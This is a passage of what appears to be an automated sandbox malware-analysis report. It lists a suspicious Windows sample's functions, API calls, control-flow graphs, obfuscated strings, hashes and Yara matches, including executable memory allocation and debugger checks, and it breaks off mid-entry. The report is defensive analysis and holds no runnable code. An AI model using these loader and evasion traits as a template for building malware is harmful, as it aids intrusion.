                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory
                                                                  • String ID: &YN9$(LE/$Y~o$[fA$rU@${X:$u{$
                                                                  • API String ID: 1611563598-2497423792
                                                                  • Opcode ID: a3ed78bc99e31acabe18fc6702c11e40a5f766bbac97d900fcff136f58a8d6f9
                                                                  • Instruction ID: 8ef21abaec44bbe41815287c391c6857c9391bbcd1975ad7498ddf25d1ae78db
                                                                  • Opcode Fuzzy Hash: a3ed78bc99e31acabe18fc6702c11e40a5f766bbac97d900fcff136f58a8d6f9
                                                                  • Instruction Fuzzy Hash: 2CA1EEB5E11218DBCB24CFAAD989ACCFBB4BF08314F208189E519BB611D7309E81CF55
                                                                  Function 00568303 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 172 568303-56831c 173 56831e-568320 172->173 174 568327-568333 CreateToolhelp32Snapshot 173->174 175 568322 173->175 176 568335-56833b 174->176 177 568343-568350 Module32First 174->177 175->174 176->177 182 56833d-568341 176->182 178 568352-568353 call 567fc2 177->178 179 568359-568361 177->179 183 568358 178->183 182->173 182->177 183->179
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0056832B
                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0056834B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 3833638111-0
                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                  • Instruction ID: 0c9a85e217f6492fba097b868cdff535ab3fe571951cf7746b930230c632b295
                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                  • Instruction Fuzzy Hash: 07F068352007156FD7202BB59C8DB7E7AE8BF49B25F100A28E682935C0DE70E8454651
                                                                  Function 00405435 Relevance: 21.1, APIs: 14, Instructions: 86COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                                  • String ID:
                                                                  • API String ID: 2477803136-0
                                                                  • Opcode ID: f23b386ac01828051d86de1a1d22736730b8a1091757b76624c1423370fe6f58
                                                                  • Instruction ID: a4ee9618ed378a3bb7a919522be3c2c40b4f225963b6fddf92c77e6441ac5f52
                                                                  • Opcode Fuzzy Hash: f23b386ac01828051d86de1a1d22736730b8a1091757b76624c1423370fe6f58
                                                                  • Instruction Fuzzy Hash: 25218070D04B1599EB247F72A946BAF3264DF10B49F10443FF445BA1C2EE7C98819E5D
                                                                  Function 00630420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 146 630420-6304f8 148 6304fa 146->148 149 6304ff-63053c CreateWindowExA 146->149 150 6305aa-6305ad 148->150 151 630540-630558 PostMessageA 149->151 152 63053e 149->152 153 63055f-630563 151->153 152->150 153->150 154 630565-630579 153->154 154->150 156 63057b-630582 154->156 157 630584-630588 156->157 158 6305a8 156->158 157->158 159 63058a-630591 157->159 158->153 159->158 160 630593-630597 call 630110 159->160 162 63059c-6305a5 160->162 162->158
                                                                  APIs
                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00630533
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                  • API String ID: 716092398-2341455598
                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                  • Instruction ID: 8d9d3a291de3b2e86f940baeb5e6d1055acf06c27ab7a3cfbd548809c47166c2
                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                  • Instruction Fuzzy Hash: 59512A70D083C8DAEB11CBD8C959BDDBFB26F11708F244058D5447F286C3BA5659CBA6
                                                                  Function 006305B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 163 6305b0-6305d5 164 6305dc-6305e0 163->164 165 6305e2-6305f5 GetFileAttributesA 164->165 166 63061e-630621 164->166 167 630613-63061c 165->167 168 6305f7-6305fe 165->168 167->164 168->167 169 630600-63060b call 630420 168->169 171 630610 169->171 171->167
                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 006305EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID: apfHQ$o
                                                                  • API String ID: 3188754299-2999369273
                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                  • Instruction ID: 0ac4966cc156a8af5756c4bc88038304a4014c9bcf64a1b2c98fb7dab43f5f02
                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                  • Instruction Fuzzy Hash: 92011E70C0424CEAEB14DB98C5193EEBFB5AF41308F148099C4092B342D7769B59CBA5
                                                                  Function 00408F76 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 185 408f76-408f98 HeapCreate 186 408f9a-408f9b 185->186 187 408f9c-408fa5 185->187
                                                                  APIs
                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00408F8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHeap
                                                                  • String ID:
                                                                  • API String ID: 10892065-0
                                                                  • Opcode ID: 412fdcfa998a2dc180ca02fdba4b4619520d9cde1d14665b4eb509facf969a3f
                                                                  • Instruction ID: 606c67907533711c90de2c00727bfc3f838b67ced10fc87823d234ed6ed07053
                                                                  • Opcode Fuzzy Hash: 412fdcfa998a2dc180ca02fdba4b4619520d9cde1d14665b4eb509facf969a3f
                                                                  • Instruction Fuzzy Hash: 36D05E329543455EDB105FB16D087673BDCD788799F00843AF94CC61A0F674D540CA08
                                                                  Function 0040B5D3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 188 40b5d3-40b5dd call 40b438 190 40b5e2-40b5ef 188->190
                                                                  APIs
                                                                  • __setmbcp.LIBCMT ref: 0040B5DD
                                                                    • Part of subcall function 0040B438: __getptd.LIBCMT ref: 0040B448
                                                                    • Part of subcall function 0040B438: getSystemCP.LIBCMT ref: 0040B45D
                                                                    • Part of subcall function 0040B438: __malloc_crt.LIBCMT ref: 0040B473
                                                                    • Part of subcall function 0040B438: __setmbcp_nolock.LIBCMT ref: 0040B496
                                                                    • Part of subcall function 0040B438: InterlockedDecrement.KERNEL32(?), ref: 0040B4AE
                                                                    • Part of subcall function 0040B438: InterlockedIncrement.KERNEL32(00000000), ref: 0040B4D3
                                                                    • Part of subcall function 0040B438: __lock.LIBCMT ref: 0040B4EE
                                                                    • Part of subcall function 0040B438: InterlockedDecrement.KERNEL32 ref: 0040B565
                                                                    • Part of subcall function 0040B438: InterlockedIncrement.KERNEL32(00000000), ref: 0040B589
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement$System__getptd__lock__malloc_crt__setmbcp__setmbcp_nolock
                                                                  • String ID:
                                                                  • API String ID: 3661747109-0
                                                                  • Opcode ID: 5b6ae681781335ac3479117c5f59d789074385256c95ecb4ea606b1de469e0f9
                                                                  • Instruction ID: 44ab008c5d06301bef77419be8941e27e3c24d4b0c73dbce5d03567f82daa7e2
                                                                  • Opcode Fuzzy Hash: 5b6ae681781335ac3479117c5f59d789074385256c95ecb4ea606b1de469e0f9
                                                                  • Instruction Fuzzy Hash: 62C09B610181440DDB085B256C4564B36504701334F648B6EF050D00D6FFB84144575E
                                                                  Function 00567FC2 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 191 567fc2-567ffc call 5682d5 194 567ffe-568031 VirtualAlloc call 56804f 191->194 195 56804a 191->195 197 568036-568048 194->197 195->195 197->195
                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00568013
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_560000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                  • Instruction ID: 49f69de65c3a81e4ebc8f8ab73b211159e5c72cec2f49315ba4ba0163a4837a0
                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                  • Instruction Fuzzy Hash: 6C112B79A40208EFDB01DF98C989E99BFF5AF08351F1580A4F9489B362D775EA50DB80

                                                                  Non-executed Functions

                                                                  Function 00404250 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 129timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 004042E7
                                                                  • GetCommConfig.KERNEL32(00000000,00000000,00000000), ref: 0040432A
                                                                  • EnumCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404347
                                                                  • GetLogicalDriveStringsA.KERNEL32(00000000,?), ref: 00404356
                                                                  • SetComputerNameA.KERNEL32(00000000), ref: 0040435E
                                                                  • ChangeTimerQueueTimer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040436C
                                                                  • GetTempFileNameW.KERNEL32(00000000,00000000,00000000,?), ref: 0040437F
                                                                  • EnumTimeFormatsA.KERNEL32(00000000,00000000,00000000), ref: 0040438B
                                                                  • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 0040439B
                                                                  • GetVersionExA.KERNEL32(?), ref: 004043A8
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 004043B2
                                                                  • GlobalUnWire.KERNEL32(00000000), ref: 004043C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: EnumFileNameTimer$AttributesCalendarChangeCommComputerConfigConsoleDriveFormatsGlobalIncrementInfoInputInterlockedLogicalQueueStringsTempTimeVersionWireWrite
                                                                  • String ID:
                                                                  • API String ID: 1727374683-3916222277
                                                                  • Opcode ID: 6c9276afa0e412c8abb43250ca6f0565623f046b8a6442b33019689993d24fb7
                                                                  • Instruction ID: 7d47a6c596a18de5428d23c08a0e8dc81690490798af32374acd518edb6a93b5
                                                                  • Opcode Fuzzy Hash: 6c9276afa0e412c8abb43250ca6f0565623f046b8a6442b33019689993d24fb7
                                                                  • Instruction Fuzzy Hash: A5511B71A40309EFEB10CF94DD85B9DBBB0FB48705F208169E605BB2A0D774AA45CF99
                                                                  Function 006346E0 Relevance: 22.8, APIs: 8, Strings: 4, Instructions: 1834COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 006349E6
                                                                  • __Init_thread_footer.LIBCMT ref: 00634BC2
                                                                  • __Init_thread_footer.LIBCMT ref: 00634EB7
                                                                  • __Init_thread_footer.LIBCMT ref: 0063507D
                                                                  • __Init_thread_footer.LIBCMT ref: 00635A7D
                                                                  • __Init_thread_footer.LIBCMT ref: 00635D8B
                                                                  • __Init_thread_footer.LIBCMT ref: 00635315
                                                                    • Part of subcall function 00641142: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00641176
                                                                  • __Init_thread_footer.LIBCMT ref: 0063557E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: O@K\$Y@BA$ZK\.$rmBK
                                                                  • API String ID: 829385169-2391139619
                                                                  • Opcode ID: e45a0d81eba9ddac200c8b89216650d56b5995dbd3a441cdaf0faa975c817427
                                                                  • Instruction ID: 2f64f28c526ef1cf2445d7835e5088fe32b392d1b189d3cf97147eb2fed739ac
                                                                  • Opcode Fuzzy Hash: e45a0d81eba9ddac200c8b89216650d56b5995dbd3a441cdaf0faa975c817427
                                                                  • Instruction Fuzzy Hash: D9F2D1B0D042589FDB24CF24CC497ADBBB2EF05304F5481E8E4496B292DB75AAC5CF99
                                                                  Function 00407750 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040C8A9
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040C8BE
                                                                  • UnhandledExceptionFilter.KERNEL32(00401D50), ref: 0040C8C9
                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0040C8E5
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0040C8EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                  • String ID: +`q
                                                                  • API String ID: 2579439406-3158646234
                                                                  • Opcode ID: acf5c39a05d8821c60c80379880b3f8d67174e4097f5a474327c7d4ed3681055
                                                                  • Instruction ID: b6578d5ef74c768942a09cb0d1250d1a40f31d58972dd500877e350be61e8469
                                                                  • Opcode Fuzzy Hash: acf5c39a05d8821c60c80379880b3f8d67174e4097f5a474327c7d4ed3681055
                                                                  • Instruction Fuzzy Hash: FD21AAB4C05300DBE720BF28E9856447BE0FF08316B40413AE569973B2E7B4A8848F1E
                                                                  Function 00405090 Relevance: 7.6, APIs: 5, Instructions: 62COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __NMSG_WRITE.LIBCMT ref: 004050B1
                                                                    • Part of subcall function 0040756C: __set_error_mode.LIBCMT ref: 0040759D
                                                                    • Part of subcall function 0040756C: __set_error_mode.LIBCMT ref: 004075AE
                                                                    • Part of subcall function 0040756C: _strcpy_s.LIBCMT ref: 004075E2
                                                                    • Part of subcall function 0040756C: __invoke_watson.LIBCMT ref: 004075F3
                                                                    • Part of subcall function 0040756C: GetModuleFileNameA.KERNEL32(00000000,0045D209,00000104,?,74DEDFA0,00000000,004045FB,00000000), ref: 0040760F
                                                                    • Part of subcall function 0040756C: _strcpy_s.LIBCMT ref: 00407624
                                                                    • Part of subcall function 0040756C: __invoke_watson.LIBCMT ref: 00407637
                                                                    • Part of subcall function 0040756C: _strlen.LIBCMT ref: 00407640
                                                                    • Part of subcall function 0040756C: _strlen.LIBCMT ref: 0040764D
                                                                    • Part of subcall function 0040756C: __invoke_watson.LIBCMT ref: 0040767A
                                                                  • _raise.LIBCMT ref: 004050C2
                                                                  • _memset.LIBCMT ref: 0040515A
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040518C
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00405199
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __invoke_watson$ExceptionFilterUnhandled__set_error_mode_strcpy_s_strlen$FileModuleName_memset_raise
                                                                  • String ID:
                                                                  • API String ID: 4212829890-0
                                                                  • Opcode ID: 0809d6e27ec0874d66909d3c869ea97b8218a0541bcab4f0214d094a66feaefe
                                                                  • Instruction ID: ab442418aec88e1ea890b2d2d7a476400d4f7229143fd3398023cb7edbbd056b
                                                                  • Opcode Fuzzy Hash: 0809d6e27ec0874d66909d3c869ea97b8218a0541bcab4f0214d094a66feaefe
                                                                  • Instruction Fuzzy Hash: 0521D770C1132D9ADB21DF659C897C9BBB4AF08714F1041EAA50CB72A1DB749BC1CF59
                                                                  Function 00641260 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61f5f756535a4035ede993857695048258d02a8dbd85f3cae79bbcafaed150b5
                                                                  • Instruction ID: 326ab3f565ee83fa2292557319c41d3fdf3d2cc2b69d70cd15c70191a03ea170
                                                                  • Opcode Fuzzy Hash: 61f5f756535a4035ede993857695048258d02a8dbd85f3cae79bbcafaed150b5
                                                                  • Instruction Fuzzy Hash: 99022C71E012199BDF14CFA9C8806EEBBF2FF49314F258269D519EB341D731AA41CB94
                                                                  Function 00635910 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 621COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00641142: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00641176
                                                                  • __Init_thread_footer.LIBCMT ref: 00635A7D
                                                                  • __Init_thread_footer.LIBCMT ref: 00635D8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Init_thread_footer$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: @BAO
                                                                  • API String ID: 829385169-3327130826
                                                                  • Opcode ID: 5a2adfa9a8e76322d9d4f0e9a0b103782ff5a58ac098cfd4e8d6cdf4395ee2d3
                                                                  • Instruction ID: 5ab3c7c851d78fcc3503770914e915bc69e0b7fd74eb026f70b6beb93141e4f0
                                                                  • Opcode Fuzzy Hash: 5a2adfa9a8e76322d9d4f0e9a0b103782ff5a58ac098cfd4e8d6cdf4395ee2d3
                                                                  • Instruction Fuzzy Hash: 20320470D002549BDB28DF24DD497EEBBB2AF05300F5482EDE4096B292DB759E84CF99
                                                                  Function 0063F82C Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: 1477b8570e16a6675b5a24fac6283d2c6c9a0facf3c5b7642ca230b5911b600f
                                                                  • Instruction ID: 41b76c1d05794ad5f40ed2315f3ea44ae8ae93d52606ed905e389f579c4a47a6
                                                                  • Opcode Fuzzy Hash: 1477b8570e16a6675b5a24fac6283d2c6c9a0facf3c5b7642ca230b5911b600f
                                                                  • Instruction Fuzzy Hash: C0C1AC70D0060A9FCB29CF68C594BBABBB7EF05314F144639E496977A1C331AD46CB91
                                                                  Function 0063F4EA Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0
                                                                  • API String ID: 0-4108050209
                                                                  • Opcode ID: e800e0acd95fef6be5267f16a41e9219e19d51ae5af7834d1b3ead906566773c
                                                                  • Instruction ID: 37cdacebf21a1e1935b3c79d1a28beae2977fa3708ca29e291089d006e4e50c0
                                                                  • Opcode Fuzzy Hash: e800e0acd95fef6be5267f16a41e9219e19d51ae5af7834d1b3ead906566773c
                                                                  • Instruction Fuzzy Hash: B6B1B171D0060A8BCB288F68D9956FEBBB3AF21314F14463EE452D77A1C6319E02CBD5
                                                                  Function 0040824A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00008208), ref: 0040824F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: 962a8472a63a494c35fba3ba6a56462e9634be2c334d1371b6710703fa2ac6f9
